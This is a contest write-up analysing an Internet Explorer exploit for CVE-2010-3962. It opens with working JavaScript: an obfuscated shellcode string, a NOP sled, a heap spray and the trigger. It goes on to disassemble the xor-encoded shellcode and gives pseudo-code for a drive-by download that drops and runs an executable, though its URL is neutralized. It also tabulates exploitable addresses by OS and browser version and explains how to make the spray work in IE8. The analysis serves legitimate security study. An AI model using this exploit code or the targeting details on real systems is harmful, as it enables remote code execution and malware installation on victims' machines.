"wo0oA75Awo0oD2F1wo0oE224wo0o9818wo0o7C90wo0o14D2wo0o0AE2wo0o6FDE" +
"wo0oEBC1wo0oA507wo0o10D9wo0oDC1Awo0o0BD2wo0o3A91wo0oEA20wo0oA4CE" +
"wo0o8F36wo0o8F5Awo0oD2F5wo0oB70Cwo0oDD5Awo0o5A9Awo0oCD8Fwo0o0CD2" +
"wo0oD55Awo0oD25Awo0o7A14wo0o888Fwo0o8412wo0o3D5Awo0o3D52wo0o8385" +
"wo0o8280wo0o8687wo0oAC5Cwo0o687Dwo0oD1C4wo0oD1D1wo0o1D69wo0o1D1D" +
"wo0o221Dwo0o167Awo0o2D94wo0oD1D1wo0oD1D1wo0o175Awo0o1152wo0o8191" +
"wo0o945Awo0o81D9wo0o872Ewo0o52C9wo0oD915wo0o9458wo0o5229wo0o29AC" +
"wo0oA4D1wo0oE2D6wo0o3811wo0oD11Dwo0oD1D1wo0o1F5Awo0o1052wo0o8095" +
"wo0o9C5Awo0o80DDwo0o872Ewo0o52C9wo0oD915wo0o9458wo0o5225wo0o25AC" +
"wo0oA4D1wo0oE2D6wo0o3811wo0oD17Dwo0oD1D1wo0o9416wo0oD13Dwo0oD1D1" +
"wo0o5AD1wo0o2584wo0oBB83wo0oBBD0wo0o5AD7wo0o5207wo0o9913wo0o2E83" +
"wo0oF187wo0o1552wo0o69C1wo0oD1D0wo0oD1D1wo0o1154wo0oBEA5wo0o9C5A" +
"wo0o8029wo0oD0BBwo0oD0BBwo0o845Cwo0o8321wo0o872Ewo0o52CDwo0oC115" +
"wo0o9458wo0o522Dwo0o2DACwo0oA4D1wo0o3AD3wo0o5A83wo0o3D94wo0o1152" +
"wo0o58D0wo0o3D94wo0oAC52wo0oD73Dwo0oD3AEwo0o183Awo0o9C5Awo0o5021" +
"wo0o2E30wo0oD1D1wo0o54D1wo0oA518wo0o5AF1wo0o2184wo0o3350wo0oD12E" +
"wo0oD1D1wo0oEF68wo0oD1D1wo0o50D1wo0o2E30wo0oD1D1wo0oEAD1wo0oA500" +
"wo0o5BD9wo0o2194wo0oEFE5wo0o9459wo0o5A21wo0o259Cwo0oBB80wo0oBBD0" +
"wo0o5CD0wo0o2184wo0o2E83wo0oF187wo0o1552wo0o3AC1wo0o5A59wo0o2994" +
"wo0o2E81wo0oF587wo0o1552wo0o5AD5wo0o259Cwo0o2E80wo0oF587wo0o1552" +
"wo0o69D5wo0oD1D0wo0oD1D1wo0o8F8Ewo0o888Awo0o528Bwo0o8515wo0o345A" +
"wo0o128Cwo0oF439wo0o2E2Cwo0o5F2Ewo0oDF9Fwo0oE23Dwo0o5B1Bwo0o498A" +
"wo0o5B2Fwo0oF4DFwo0o2E61wo0o6113wo0oFC98wo0oA50Awo0o99CFwo0oBF1C" +
"wo0oFFADwo0o7530wo0oDFA8wo0o0936wo0o765Bwo0o8936wo0o4F9Dwo0oE70A" +
"wo0oFECBwo0o8FA1wo0o306Awo0oC3CAwo0o1AD3wo0oE0C4wo0oE2E3wo0oE4E5" +
"wo0oE6E7wo0oE8E9wo0oD1E1wo0oA3D1wo0oFAB3wo0oA6D1wo0oFAB3wo0o9CD1" +
"wo0o418Bwo0oD2D1wo0oD1D1wo0o98D1wo0o8994wo0o9D81wo0o839Ewo0oFF94" +
"wo0o8994wo0oD194wo0oA1BEwo0oBFB4wo0oB9D1wo0oA5A5wo0oEBA1wo0oFEFE" +
"wo0oA6A6wo0oFFA6wo0oB9B0wo0oBDBFwo0oB3B0wo0oB2FFwo0oBCBEwo0oBAD1" +
"wo0oA8B4wo0oEBF1wo0oB9F1wo0oBDB4wo0oBEBDwo0o90F1wo0o9482wo0o9192" +
"wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0" +
"wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0oD1F0"
);
shellcode = unescape(shellcode_esc.replace(/wo0o/g,"%u"));
// Make NOP-sled
var nopsled_len = 0x86000 - (shellcode.length * 2);
nopsled_short = unescape(
'%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090' +
'%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090' +
'%u9090%u9090%u9090%u9090%u9090%u9090%u9090');
while(nopsled_short.length < nopsled_len / 2)
{
nopsled_short += nopsled_short;
}
var nopsled = nopsled_short.substring(0, nopsled_len / 2);
// Heap Splay
mem = new Array();
for(i=0; i<1500; i++)
{
mem[i] = nopsled + nopsled + shellcode;
}
// Exploit it!
document.write("<table style=position:absolute;clip:rect(0)>");
It is very easy to understand. By `unescape'ing the long string, it expands to the shellcode. And this script concatinates the shellcode with very-very long NOP-sled and do heap-splay. And then, exploit the browser. From this script, I can guess some interesting things.
I guess shellcode is ran following NOP-sled so I assume this shellcode is valid x86-code and now decode and disassemble it.
; SHELLCODE header (disassembled by ndisasm 2.08)
; POC Hackers' Dream contest
; 1. jump near the payload
00000000 EB10 jmp short 0x12
; 3. ebx is now absolute address of payload
00000002 5B pop ebx
; 4. decrypt the payload (xor 0xd1)
; note that ebx is pre-decremented because
; loop instruction is executed when ecx != 0.
; if first `dec ebx' is missing, first byte of
; payload is not decrypted which causes crash.
00000003 4B dec ebx
00000004 33C9 xor ecx,ecx
00000006 66B98303 mov cx,0x383
0000000A 80340BD1 xor byte [ebx+ecx],0xd1
0000000E E2FA loop 0xa
; 5. run shellcode payload
00000010 EB05 jmp short 0x17
; 2. dummy call (to get current EIP)
00000012 E8EBFFFFFF call dword 0x2
00000017 (encrypted payload following)
It is so obvious! In the shellcode header, it uses xor decryption (with byte-key 0xd1) and runs its payload following decryption.
By decrypting the payload as the same way as its header, I found some interesting strings.
I believe the string beginning with 'key : ' is the key.
First, I thought this part of string is just a placeholder. I thought REAL key appear after `running' the shellcode, but this part is not modified during shellcode execution.
FYI, I will show the pseudo-code of shellcode activity.
// CAUTION: This is a pseudo-code.
// The real shellcode is more complicated and `dangerous'.
HINSTANCE hInstance;
char file1[256];
char file2[256];
// load the address of various APIs
hInstance = /* known address of kernel32.dll */;
GetProcAddress(hInstance, "LoadLibraryA");
GetProcAddress(hInstance, "GetTempPathA");
GetProcAddress(hInstance, "WinExec");
GetProcAddress(hInstance, "DeleteFileA");
GetProcAddress(hInstance, "Sleep");
hInstance = LoadLibraryA("msvcrt");
GetProcAddress(hInstance, "exit");
GetProcAddress(hInstance, "fopen");
GetProcAddress(hInstance, "fread");
GetProcAddress(hInstance, "fwrite");
GetProcAddress(hInstance, "fclose");
hInstance = LoadLibraryA("urlmon");
GetProcAddress(hInstance, "URLDownloadToFileA");
hInstance = LoadLibraryA("shell32");
GetProcAddress(hInstance, "ShellExecuteA");
GetProcAddress(hInstance, "SHGetSpecialFolderPathA");
// drive-by-download!
GetTempPathA(256, file1);
strcat(file1, "log.gif");
/*** NOTE THAT URL HAS BEEN NEUTRALIZED. ***/
/*** SO DRIVE-BY-DOWNLOAD DOES NOT WORK. ***/
URLDownloadToFileA(NULL, " : hello ASEC@!@!@!@!@!@!@!@!@!@!@!@!@!", file1, 0, NULL);
SHGetSpecialFolderPathA(NULL, file2, CSIDL_APPDATA, FALSE);
strcat(file2, "\alg.exe");
MALICIOUS_GENERATE_CODE(file1, file2); // generate PE-file `file2'.
WinExec(SW_HIDE, file2);
Sleep(1000);
DeleteFileA(file1);
// show another webpage
ShellExecuteA("open", "IEXPLORE.EXE", "http://www.ahnlab.com", NULL, SW_SHOWMAXIMIZED);
// close current browser
exit( /* unpredictable value */ );
None of these activities modify the key string, at all. So I believe this key string IS THE KEY.
This payload is a bit OS-dependent. Because a part of payload expects DLL code is formed in specific way. I will show you a part of payload disassembly.
; 0. ebx = "msvcrt"
00000035 8BDC mov ebx,esp
; 1. jump
00000037 EB10 jmp short 0x49
; 3-1. push "msvcrt"
00000039 53 push ebx
; 3-2. push 'ret' instruction
0000003A FF7634 push dword [esi+0x34]
; 3-3. avoid breakpoints?
0000003D 8BFF mov edi,edi
0000003F 55 push ebp
00000040 8BEC mov ebp,esp
; 3-4. edx = &LoadLibraryA
00000042 8B16 mov edx,[esi]
; 3-5. edx = &LoadLibraryA + 5;
; we have to execute first 5-bytes of LoadLibraryA.
; assembly code below:
; - mov edi, edi
; - push ebp
; - mov ebp, esp
00000044 8D5205 lea edx,[edx+0x5]
; 3-6. call LoadLibraryA(+5)
00000047 FFE2 jmp edx
; 2. push return address
00000049 E8EBFFFFFF call dword 0x39
This executes 5-bytes after the beginning of LoadLibraryA function (to avoid breakpoints, probably.) In this part, the first 5-bytes (3-instruction) of the function must be formed in the way above. This is the Windows HotPatch specific function prologue.
But, LoadLibraryA function of Windows XP SP0 and SP1 have different form of function prologue because it is not a HotPatch build. So the payload is suffered by the stack problem and just crashes on these verisions of OSes.
Windows XP SP2 is the first operating system version with HotPatch images so target (client) OSes are Windows XP SP2 or later.
More of that, this exploit does not work when DEP is on. It means, target OSes are very limited.
By googling, I found this vulnerability is CVE-2010-3962. The site above tells me shellcode is very IE-version specific (more specificly, mshtml.dll version specific) and EIP address is uncontrollable by the exploit. I made own payload and ran it in several combinations of IE and OS. Note that I tried `decoded' shellcode, not the `aaencode'd one.
combination | DEP on IE | ASLR on IE | aaencode works | mshtml.dll base tested | decoded exploit/payload works |
XP x86 SP0 (en) / IE6 (mshtml: 6.0.2600.0) | none | none | no | 74810000 | no - payload incompatible (INEXPLOITABLE EIP: 0xB87493AD) |
XP x86 SP1 (en) / IE6 (mshtml: 6.0.2800.1106) | none | none | no | 74810000 | no - payload incompatible (INEXPLOITABLE EIP: 0x84748A62) |
XP x86 SP2 (en) / IE6 (mshtml: 6.0.2900.2180) | default no | none | no | 7D4A0000 | no (INEXPLOITABLE EIP: 0xCE7D4F7C) |
XP x86 SP2 (en) / IE6 (mshtml: 6.0.2900.3698) | default no | none | no | 7DC30000 | default yes (exploitable EIP: 0x5C7DC9D0) |
XP x86 SP3 (en) / IE6 (mshtml: 6.0.2900.5969) | default no | none | no | 7DC30000 | no (INEXPLOITABLE EIP: 0xDC7DC9D0) |
XP x86 SP3 (en) / IE6 (mshtml: 6.0.2900.6003) | default no | none | no | 7DC30000 | no (INEXPLOITABLE EIP: 0x837DC9D0) |
XP x86 SP3 (en) / IE6 (mshtml: 6.0.2900.6036) | default no | none | no | 7DC30000 | default yes (exploitable EIP: 0x0E7DC9CD) |
XP x86 SP2 (en) / IE7 (mshtml: 7.0.5730.13) | default no | none | no | 7E830000 | default yes (exploitable EIP: 0x597E85F9) |
XP x86 SP3 (en) / IE7 (mshtml: 7.0.5730.13) | default no | none | no | 7E830000 | default yes (exploitable EIP: 0x597E85F9) |
XP x86 SP3 (en) / IE7 (mshtml: 7.0.6000.17080) | default no | none | no | 3CEA0000 | default yes (exploitable EIP: 0x303CEEBB) |
XP x86 SP3 (en) / IE7 (mshtml: 7.0.6000.17092) | default no | none | no | 3CEA0000 | no (INEXPLOITABLE EIP: 0xF83CEEBB) |
XP x86 SP2 (en) / IE8 (mshtml: 8.0.6001.18702) | default no | none | yes | 63580000 | no - exploit incompatible (possibly exploitable EIP: 0x646367B2) |
XP x86 SP3 (en) / IE8 (mshtml: 8.0.6001.18702) | default yes | none | yes | 63580000 | no - exploit incompatible (possibly exploitable EIP: 0x646367B2) |
XP x86 SP3 (en) / IE8 (mshtml: 8.0.6001.18939) | default yes | none | yes | 3CEA0000 | no - exploit incompatible (possibly exploitable EIP: 0x1D3CF5BD) |
XP x86 SP3 (en) / IE8 (mshtml: 8.0.6001.18975) | default yes | none | yes | 3CEA0000 | no - exploit incompatible (possibly exploitable EIP: 0x4D3CF5BF) |
XP x64 SP1 (en) / IE6 (mshtml: 6.0.3790.2643 ; 32-bit) | default no | none | no | 4A500000 | no (INEXPLOITABLE EIP: 0x9B4A5B08) |
XP x64 SP2 (en) / IE6 (mshtml: 6.0.3790.3959 ; 32-bit) | default no | none | no | 02580000 | default yes (exploitable EIP: 0x5102A2B7) |
XP x64 SP2 (en) / IE6 (mshtml: 6.0.3790.4772 ; 32-bit) | default no | none | no | 02490000 | no (INEXPLOITABLE EIP: 0x910292B7) |
XP x64 SP2 (en) / IE7 (mshtml: 7.0.5730.13 ; 32-bit) | default no | none | no | 63580000 | default yes (exploitable EIP: 0x59635AF9) |
XP x64 SP2 (en) / IE7 (mshtml: 7.0.6000.17092 ; 32-bit) | default no | none | no | 3F9A0000 | no (INEXPLOITABLE EIP: 0xF83F9EBB) |
XP x64 SP2 (en) / IE8 (mshtml: 8.0.6001.18702 ; 32-bit) | default no | none | yes | 63580000 | no - exploit incompatible (possibly exploitable EIP: 0x646367B2) |
XP x64 SP2 (en) / IE8 (mshtml: 8.0.6001.18975 ; 32-bit) | default no | none | yes | 3F9A0000 | no - exploit incompatible (possibly exploitable EIP: 0x4D3FA5BF) |
Svr2k3 x86 SP0 (en) / IE6 (mshtml: 6.0.3790.0) | none | none | no | 745E0000 | no - payload incompatible (INEXPLOITABLE EIP: 0xAD745E3F) |
Svr2k3 x86 SP0 (en) / IE6 (mshtml: 6.0.3790.630) | none | none | no | 77380000 | no - payload incompatible (exploitable EIP: 0x117745FE) |
Svr2k3 x86 SP1 (en) / IE6 (mshtml: 6.0.3790.1830) | default yes | none | no | 7D0E0000 | no (INEXPLOITABLE EIP: 0xA17D1900) |
Svr2k3 x86 SP1 (en) / IE6 (mshtml: 6.0.3790.3304) | default yes | none | no | 4A500000 | default no - blocked by DEP (exploitable EIP: 0x324A5B06) |
Svr2k3 x86 SP2 (en) / IE6 (mshtml: 6.0.3790.4470) | default yes | none | no | 7F9E0000 | no (INEXPLOITABLE EIP: 0xB17FABB7) |
Svr2k3 x64 SP1 (en) / IE6 (mshtml: 6.0.3790.1830 ; 32-bit) | default yes | none | no | 7D0E0000 | no (INEXPLOITABLE EIP: 0xA17D1900) |
Svr2k3 x64 SP1 (en) / IE6 (mshtml: 6.0.3790.3304 ; 32-bit) | default yes | none | no | 4A500000 | default no - blocked by DEP (exploitable EIP: 0x324A5B06) |
Vista x86 SP0 (en) / IE7 (mshtml: 7.0.6000.16386) | default yes* | default yes | no | 6D440000 | no (INEXPLOITABLE EIP: 0xE36D48B9) |
Vista x86 SP1 (en) / IE7 (mshtml: 7.0.6001.18000) | default yes* | default yes | no | 6BB60000 | default no (exploitable EIP: 0x596BC2FE / can vary) |
The target script won't run on IE8 because heap-splay code is WRONG in this version of browser.
Target script uses /* deobfuscated form */ mem[i] = nopsled + nopsled + shellcode;
for heap-splay but this chunk will be translated into a pointer-copy (not a content-copy!) in IE8.
So the target script is no longer heap-splay in IE8.
This is amazing! None of the browser can actually run the exploit in Web-Challenge.html
without decoding it! How safe it is!
To make the shellcode run, we have to use `substring' (or substr) method
to force IE8 to use content-copy (not pointer-copy. Even though,
the exploit can fail because of heap-splay failure. I did not care
whether heap-splay fails.)
Second notable thing is: address is actually mshtml.dll dependent but can vary between platform. Look at the IE7, mshtml version 7.0.5730.13. It has same exploit EIP (0x597E85F9) for x86 editions but x64 edition has different exploit EIP (0x59635AF9). It is because the loaded base address of mshtml.dll is different (even the exact same binary is loaded, exploit EIP is different.)
Others...